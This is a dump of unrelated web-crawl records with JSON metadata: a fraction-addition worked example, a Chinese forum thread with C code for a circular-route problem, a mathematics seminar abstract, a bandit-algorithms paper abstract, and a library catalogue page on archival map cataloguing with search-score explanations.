[ "Solutions by everydaycalculation.com\n\n1st number: 3 6/8, 2nd number: 1 3/24\n\n30/8 + 27/24 is 39/8.\n\n1. Find the least common denominator or LCM of the two denominators:\nLCM of 8 and 24 is 24\n2. For the 1st fraction, since 8 × 3 = 24,\n30/8 = 30 × 3/8 × 3 = 90/24\n3. Likewise, for the 2nd fraction, since 24 × 1 = 24,\n27/24 = 27 × 1/24 × 1 = 27/24\n90/24 + 27/24 = 90 + 27/24 = 117/24\n5. 117/24 simplified gives 39/8\n6. So, 30/8 + 27/24 = 39/8\nIn mixed form: 47/8\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7510416,"math_prob":0.99844927,"size":367,"snap":"2020-10-2020-16","text_gpt3_token_len":155,"char_repetition_ratio":0.18732782,"word_repetition_ratio":0.0,"special_character_ratio":0.5095368,"punctuation_ratio":0.08888889,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99676436,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-27T03:06:57Z\",\"WARC-Record-ID\":\"<urn:uuid:5ad0bb6b-675c-4f05-ac0d-fb69c7d214c9>\",\"Content-Length\":\"8108\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2a979bd8-b405-4c2f-a6f3-440a42efa2a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:858b8cdf-357f-4195-a3f3-f8d04c9fbe14>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/add-fractions/30-8-plus-27-24\",\"WARC-Payload-Digest\":\"sha1:GOL7KKXQAP3PAYFLOBHACJ5T4VNCUEKH\",\"WARC-Block-Digest\":\"sha1:K2AFRQO2CRAWRFAI5VZHFD7YK6JLH7NV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146643.49_warc_CC-MAIN-20200227002351-20200227032351-00437.warc.gz\"}"}
https://www.wenjiangs.com/group/topic-10259.html
[ "# C++-汽车环岛一周", null, "### 发布评论", null, "### 评论(2)", null, "2017-01-09 2 楼\n\n(这里要注意应把i看作我们枚举的尾部,仔细想想。i要满足条件i<2*n(因为我们枚举时V[n-1]->V->V->....->V[n-2]是最后一条可能路径)取模是为了绕个圈)\n\nlen+=1;\n\ni+=1;往后枚举。\n\nint circle(int *d,int n,int Ld){ //Ld=L*d\nfor(int i=0;i<n;++i) //O(n)\nd[i]-=Ld;\nint len=0,sum=0;\nfor(int i=0;i<(n<<1);++i){\nsum+=d[i%n];\nif(sum<0){\nsum=0;\nlen=0;\n}\nelse\nreturn i-n+1;\n}\n}", null, "2017-01-06 1 楼\n\nV >= L * d;\nV >= V - 2 * L * d;\nV >= V + V - 3 * L * d;\nV[n-1] >= V[n-2] + V[n-3] + ... V - n * L * d;\n\nV[i] >= V[i-1] + V[i-2] + ... V - (i+1) * L * d;\n\n1497 主题\n4058 回复\n18689 人气\n\n### 相关话题", null, "" ]
[ null, "http://static.wenjiangs.com/dewen/laankicq0em-930.jpg", null, "https://asset.wenjiangs.com/images/avatars.png", null, "https://www.wenjiangs.com/wp-content/uploads/2017/05/guishu.jpg", null, "https://www.wenjiangs.com/wp-content/uploads/2017/05/1254.jpg", null, "https://asset.wenjiangs.com/11.30.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.86434746,"math_prob":0.9976773,"size":2869,"snap":"2021-43-2021-49","text_gpt3_token_len":2291,"char_repetition_ratio":0.09075043,"word_repetition_ratio":0.94779116,"special_character_ratio":0.36075288,"punctuation_ratio":0.12541254,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9963448,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,1,null,null,null,6,null,7,null,9,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T04:09:43Z\",\"WARC-Record-ID\":\"<urn:uuid:ca97e57c-074a-4612-b8b8-37c18fd90fee>\",\"Content-Length\":\"31461\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1134387c-b80c-4c1f-b6f0-5ba5445e4600>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bf6f6bb-0846-4138-895b-a7ed67563fd3>\",\"WARC-IP-Address\":\"123.57.233.100\",\"WARC-Target-URI\":\"https://www.wenjiangs.com/group/topic-10259.html\",\"WARC-Payload-Digest\":\"sha1:YMA4EFMJJYTWN6SG4JWNKE5UTEE4JMMY\",\"WARC-Block-Digest\":\"sha1:KNKITFNS23MJAVMSIOQVVVVMOUECNLSK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585381.88_warc_CC-MAIN-20211021040342-20211021070342-00283.warc.gz\"}"}
https://www.niser.ac.in/sms/news/seminar-156
[ "# News & Events\n\n## Seminar\n\nDate/Time:\nThursday, January 3, 2019 - 11:30\nVenue:\nM1\nSpeaker:\nAffiliation:\nISI Kolkata\nTitle:\nFree-type rigid C*-tensor categories and their annular representations\n\nC*-tensor categories are important descriptors of generalized symmetries appearing in non-commutative analysis and mathematical physics. An important algebra associated to a rigid semisimple C*-tensor category $\\mathcal{C}$ is the tube algebra $\\mathcal{A}\\mathcal{C}$. The tube algebra admits a universal C*-algebra, hence has a well behaved representation category. Further, this representation category provides a useful way to describe the analytic properties of initial C*-tensor categories, such as amenability, the Haagerup property, and property (T).With a brief motivation from different directions, in this talk, I will move on to describing the annular algebra $\\mathcal{A}\\Lambda$ associated to a rigid C*-tensor category $\\mathcal{C}$. The annular representation category of $\\mathcal{C}$ is the category of $*$-representations of the annular algebra $\\mathcal{A}\\Lambda$. I will then present a description of the annular representation category of free product of two categories with an application to the Fuss-Catalan subfactor planar algebra.We then move onto oriented extensions of subfactor planar algebras (or equivalently singly generated C*-2-categories), which are a class of singly generated C*-tensor categories (or equivalently oriented factor planar algebras). I will end the talk with few problems which could extend this work." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7931548,"math_prob":0.8838454,"size":1519,"snap":"2020-24-2020-29","text_gpt3_token_len":357,"char_repetition_ratio":0.14587459,"word_repetition_ratio":0.009852217,"special_character_ratio":0.22119816,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98559725,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-06-06T18:05:06Z\",\"WARC-Record-ID\":\"<urn:uuid:e85b2a03-1839-471b-8f35-72450255e4c2>\",\"Content-Length\":\"44434\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:27b0c56f-d947-4649-8050-cbf117219995>\",\"WARC-Concurrent-To\":\"<urn:uuid:10d9f965-4a7a-42ab-b058-3b1a4d808141>\",\"WARC-IP-Address\":\"210.212.23.110\",\"WARC-Target-URI\":\"https://www.niser.ac.in/sms/news/seminar-156\",\"WARC-Payload-Digest\":\"sha1:XZPH2S3NOBPHLPZV4Y4UNCKRZQ7DSJY5\",\"WARC-Block-Digest\":\"sha1:XBZXWTEHWHF5RIR3NT35V2ZXDD5HEOZL\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590348517506.81_warc_CC-MAIN-20200606155701-20200606185701-00302.warc.gz\"}"}
https://virtual.aistats.org/virtual/2021/poster/1577
[ "## Bandit algorithms: Letting go of logarithmic regret for statistical robustness\n\n### Kumar Ashutosh · Jayakrishnan Nair · Anmol Kagrecha · Krishna Jagannathan\n\nKeywords: [ Learning Theory and Statistics ] [ Decision Processes and Bandits ]\n\nAbstract:\n\nWe study regret minimization in a stochastic multi-armed bandit setting, and establish a fundamental trade-off between the regret suffered under an algorithm, and its statistical robustness. Considering broad classes of underlying arms' distributions, we show that bandit learning algorithms with logarithmic regret are always inconsistent and that consistent learning algorithms always suffer a super-logarithmic regret. This result highlights the inevitable statistical fragility of all `logarithmic regret' bandit algorithms available in the literature - for instance, if a UCB algorithm designed for 1-subGaussian distributions is used in a subGaussian setting with a mismatched variance parameter, the learning performance could be inconsistent. Next, we show a positive result: statistically robust and consistent learning performance is attainable if we allow the regret to be slightly worse than logarithmic. Specifically, we propose three classes of distribution oblivious algorithms that achieve an asymptotic regret that is arbitrarily close to logarithmic." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.853299,"math_prob":0.87760526,"size":1148,"snap":"2022-05-2022-21","text_gpt3_token_len":203,"char_repetition_ratio":0.13636364,"word_repetition_ratio":0.0,"special_character_ratio":0.16027875,"punctuation_ratio":0.081871346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95893556,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T01:34:10Z\",\"WARC-Record-ID\":\"<urn:uuid:7a09b31f-3ef0-4ec7-8ed0-1eb19f7d4225>\",\"Content-Length\":\"11545\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c8d1849d-27c7-4846-b578-a2702d99181e>\",\"WARC-Concurrent-To\":\"<urn:uuid:3d1bc5f7-744f-4560-88c3-21b670fb1f96>\",\"WARC-IP-Address\":\"198.202.70.65\",\"WARC-Target-URI\":\"https://virtual.aistats.org/virtual/2021/poster/1577\",\"WARC-Payload-Digest\":\"sha1:HK5VOUWRARTZEF5IT7FX6AEMISYBHZTB\",\"WARC-Block-Digest\":\"sha1:W2HVSA52OW2QL6XQSWQ2RIQ55CV4MMIL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662552994.41_warc_CC-MAIN-20220523011006-20220523041006-00461.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/31621
[ "# Document (#31621)\n\nAuthor\nCorsaro, J.\nTitle\nControl of cartographic materials in archives\nSource\nCataloging and classification quarterly. 11(1990) nos.3/4, S.213-228\nYear\n1990\nAbstract\nArchival repositories are a major source of cartographic information useful for many kinds of research. Access to these cartographic resources is an integral part of their availability and is related to the general principles of archival arrangement and description. The automation of archival access using the MARC Format for Archives and Manuscripts Control has created great changes in archival description practices. Although there has been a MARC Format for Maps for several years, this format is not as useful for the description of cartographic archives and archivists have not yet developed the generally accepted standards needed to make these materials accessible to a wide range of users. This paper discusses the differences in archival and bibliographic description of maps and suggests some possible options for standards development in the control of cartographic archives.\nFootnote\nSimultaneously published as Describing Archival Materials: The Use of the MARC AMC Format\nField\nGeowissenschaften\nForm\nKarten\nArea\nArchive\n\n## Similar documents (content)\n\n1. Stibbe, H.L.P.: Cataloguing cartographic materials in archives (1999) 0.34\n```0.3437991 = sum of:\n0.3437991 = product of:\n1.227854 = sum of:\n0.032475874 = weight(abstract_txt:generally in 513) [ClassicSimilarity], result of:\n0.032475874 = score(doc=513,freq=1.0), product of:\n0.071567535 = queryWeight, product of:\n5.808377 = idf(docFreq=352, maxDocs=43254)\n0.012321435 = queryNorm\n0.45377943 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.808377 = idf(docFreq=352, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.010941735 = weight(abstract_txt:these in 513) [ClassicSimilarity], result of:\n0.010941735 = score(doc=513,freq=1.0), product of:\n0.04365925 = queryWeight, product of:\n1.1045747 = boost\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.012321435 = queryNorm\n0.25061664 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.039230112 = weight(abstract_txt:materials in 513) [ClassicSimilarity], result of:\n0.039230112 = score(doc=513,freq=1.0), product of:\n0.102273986 = queryWeight, product of:\n1.6905949 = boost\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.012321435 = queryNorm\n0.3835786 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.10691323 = weight(abstract_txt:description in 513) [ClassicSimilarity], result of:\n0.10691323 = score(doc=513,freq=2.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.5357864 = fieldWeight in 513, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.18237998 = weight(abstract_txt:archives in 513) [ClassicSimilarity], result of:\n0.18237998 = score(doc=513,freq=2.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.640187 = fieldWeight in 513, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.42569333 = weight(abstract_txt:archival in 513) [ClassicSimilarity], result of:\n0.42569333 = score(doc=513,freq=4.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.99323833 = fieldWeight in 513, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.43021983 = weight(abstract_txt:cartographic in 513) [ClassicSimilarity], result of:\n0.43021983 = score(doc=513,freq=1.0), product of:\n0.6851607 = queryWeight, product of:\n6.918679 = boost\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.012321435 = queryNorm\n0.62791085 = fieldWeight in 513, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.078125 = fieldNorm(doc=513)\n0.28 = coord(7/25)\n```\n2. Carini, P.; Shepherd, K.: ¬The MARC standard and encoded archival description (2004) 0.31\n```0.31427556 = sum of:\n0.31427556 = product of:\n1.1224127 = sum of:\n0.022546375 = weight(abstract_txt:access in 4831) [ClassicSimilarity], result of:\n0.022546375 = score(doc=4831,freq=1.0), product of:\n0.056491695 = queryWeight, product of:\n1.2564617 = boost\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.012321435 = queryNorm\n0.39910954 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.0914158 = weight(abstract_txt:archivists in 4831) [ClassicSimilarity], result of:\n0.0914158 = score(doc=4831,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.80183244 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.05147285 = weight(abstract_txt:standards in 4831) [ClassicSimilarity], result of:\n0.05147285 = score(doc=4831,freq=1.0), product of:\n0.09794575 = queryWeight, product of:\n1.6544352 = boost\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.012321435 = queryNorm\n0.5255241 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.07698692 = weight(abstract_txt:marc in 4831) [ClassicSimilarity], result of:\n0.07698692 = score(doc=4831,freq=1.0), product of:\n0.1280987 = queryWeight, product of:\n1.8920357 = boost\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.012321435 = queryNorm\n0.60099685 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.183318 = weight(abstract_txt:description in 4831) [ClassicSimilarity], result of:\n0.183318 = score(doc=4831,freq=3.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.9186823 = fieldWeight in 4831, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.18054698 = weight(abstract_txt:archives in 4831) [ClassicSimilarity], result of:\n0.18054698 = score(doc=4831,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.6337529 = fieldWeight in 4831, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.51612574 = weight(abstract_txt:archival in 4831) [ClassicSimilarity], result of:\n0.51612574 = score(doc=4831,freq=3.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n1.2042375 = fieldWeight in 4831, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.109375 = fieldNorm(doc=4831)\n0.28 = coord(7/25)\n```\n3. Stibbe, H.L.P.: Cataloguing cartographic materials in archives (1999) 0.30\n```0.29902875 = sum of:\n0.29902875 = product of:\n1.0679598 = sum of:\n0.008753388 = weight(abstract_txt:these in 339) [ClassicSimilarity], result of:\n0.008753388 = score(doc=339,freq=1.0), product of:\n0.04365925 = queryWeight, product of:\n1.1045747 = boost\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.012321435 = queryNorm\n0.20049332 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.2078931 = idf(docFreq=4754, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.0522376 = weight(abstract_txt:archivists in 339) [ClassicSimilarity], result of:\n0.0522376 = score(doc=339,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.45818996 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.03138409 = weight(abstract_txt:materials in 339) [ClassicSimilarity], result of:\n0.03138409 = score(doc=339,freq=1.0), product of:\n0.102273986 = queryWeight, product of:\n1.6905949 = boost\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.012321435 = queryNorm\n0.3068629 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9098063 = idf(docFreq=866, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.104753144 = weight(abstract_txt:description in 339) [ClassicSimilarity], result of:\n0.104753144 = score(doc=339,freq=3.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.5249613 = fieldWeight in 339, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.14590399 = weight(abstract_txt:archives in 339) [ClassicSimilarity], result of:\n0.14590399 = score(doc=339,freq=2.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.51214963 = fieldWeight in 339, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.38075173 = weight(abstract_txt:archival in 339) [ClassicSimilarity], result of:\n0.38075173 = score(doc=339,freq=5.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.8883794 = fieldWeight in 339, product of:\n2.236068 = tf(freq=5.0), with freq of:\n5.0 = termFreq=5.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.34417588 = weight(abstract_txt:cartographic in 339) [ClassicSimilarity], result of:\n0.34417588 = score(doc=339,freq=1.0), product of:\n0.6851607 = queryWeight, product of:\n6.918679 = boost\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.012321435 = queryNorm\n0.5023287 = fieldWeight in 339, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.037259 = idf(docFreq=37, maxDocs=43254)\n0.0625 = fieldNorm(doc=339)\n0.28 = coord(7/25)\n```\n4. Hsueh, L.-k.: ¬The development and implementation of the MARC AMC : an overview (1997) 0.28\n```0.28430167 = sum of:\n0.28430167 = product of:\n1.1845903 = sum of:\n0.13985881 = weight(abstract_txt:manuscripts in 4285) [ClassicSimilarity], result of:\n0.13985881 = score(doc=4285,freq=1.0), product of:\n0.11933891 = queryWeight, product of:\n1.2913173 = boost\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.012321435 = queryNorm\n1.1719465 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.1099813 = weight(abstract_txt:marc in 4285) [ClassicSimilarity], result of:\n0.1099813 = score(doc=4285,freq=1.0), product of:\n0.1280987 = queryWeight, product of:\n1.8920357 = boost\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.012321435 = queryNorm\n0.8585669 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.494828 = idf(docFreq=482, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.11946239 = weight(abstract_txt:control in 4285) [ClassicSimilarity], result of:\n0.11946239 = score(doc=4285,freq=1.0), product of:\n0.15494707 = queryWeight, product of:\n2.5485566 = boost\n4.9343257 = idf(docFreq=845, maxDocs=43254)\n0.012321435 = queryNorm\n0.7709884 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9343257 = idf(docFreq=845, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.13167018 = weight(abstract_txt:format in 4285) [ClassicSimilarity], result of:\n0.13167018 = score(doc=4285,freq=1.0), product of:\n0.16533096 = queryWeight, product of:\n2.6325686 = boost\n5.0969834 = idf(docFreq=718, maxDocs=43254)\n0.012321435 = queryNorm\n0.79640365 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.0969834 = idf(docFreq=718, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.25792426 = weight(abstract_txt:archives in 4285) [ClassicSimilarity], result of:\n0.25792426 = score(doc=4285,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.90536124 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.42569333 = weight(abstract_txt:archival in 4285) [ClassicSimilarity], result of:\n0.42569333 = score(doc=4285,freq=1.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n0.99323833 = fieldWeight in 4285, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.15625 = fieldNorm(doc=4285)\n0.24 = coord(6/25)\n```\n5. Descriptive standards and the archival profession (2003) 0.26\n```0.26484683 = sum of:\n0.26484683 = product of:\n0.9458815 = sum of:\n0.019325463 = weight(abstract_txt:access in 635) [ClassicSimilarity], result of:\n0.019325463 = score(doc=635,freq=1.0), product of:\n0.056491695 = queryWeight, product of:\n1.2564617 = boost\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.012321435 = queryNorm\n0.34209388 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.6490016 = idf(docFreq=3058, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.0783564 = weight(abstract_txt:archivists in 635) [ClassicSimilarity], result of:\n0.0783564 = score(doc=635,freq=1.0), product of:\n0.114008605 = queryWeight, product of:\n1.2621495 = boost\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.012321435 = queryNorm\n0.68728495 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.3310394 = idf(docFreq=76, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.08391529 = weight(abstract_txt:manuscripts in 635) [ClassicSimilarity], result of:\n0.08391529 = score(doc=635,freq=1.0), product of:\n0.11933891 = queryWeight, product of:\n1.2913173 = boost\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.012321435 = queryNorm\n0.7031679 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.500458 = idf(docFreq=64, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.07641736 = weight(abstract_txt:standards in 635) [ClassicSimilarity], result of:\n0.07641736 = score(doc=635,freq=3.0), product of:\n0.09794575 = queryWeight, product of:\n1.6544352 = boost\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.012321435 = queryNorm\n0.78020084 = fieldWeight in 635, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n4.8047915 = idf(docFreq=962, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.09071889 = weight(abstract_txt:description in 635) [ClassicSimilarity], result of:\n0.09071889 = score(doc=635,freq=1.0), product of:\n0.1995445 = queryWeight, product of:\n3.33958 = boost\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.012321435 = queryNorm\n0.45462984 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.849385 = idf(docFreq=920, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.15475456 = weight(abstract_txt:archives in 635) [ClassicSimilarity], result of:\n0.15475456 = score(doc=635,freq=1.0), product of:\n0.28488547 = queryWeight, product of:\n3.9903142 = boost\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.012321435 = queryNorm\n0.54321676 = fieldWeight in 635, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.794312 = idf(docFreq=357, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.4423935 = weight(abstract_txt:archival in 635) [ClassicSimilarity], result of:\n0.4423935 = score(doc=635,freq=3.0), product of:\n0.42859134 = queryWeight, product of:\n5.4720325 = boost\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.012321435 = queryNorm\n1.0322036 = fieldWeight in 635, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.356725 = idf(docFreq=203, maxDocs=43254)\n0.09375 = fieldNorm(doc=635)\n0.28 = coord(7/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6775733,"math_prob":0.9986806,"size":15378,"snap":"2021-31-2021-39","text_gpt3_token_len":5884,"char_repetition_ratio":0.2389749,"word_repetition_ratio":0.485223,"special_character_ratio":0.53407466,"punctuation_ratio":0.283394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975675,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T06:23:29Z\",\"WARC-Record-ID\":\"<urn:uuid:25d8967c-ac69-4ad8-a10c-a9159db23e89>\",\"Content-Length\":\"26632\",\"Content-Type\":\"application/http; 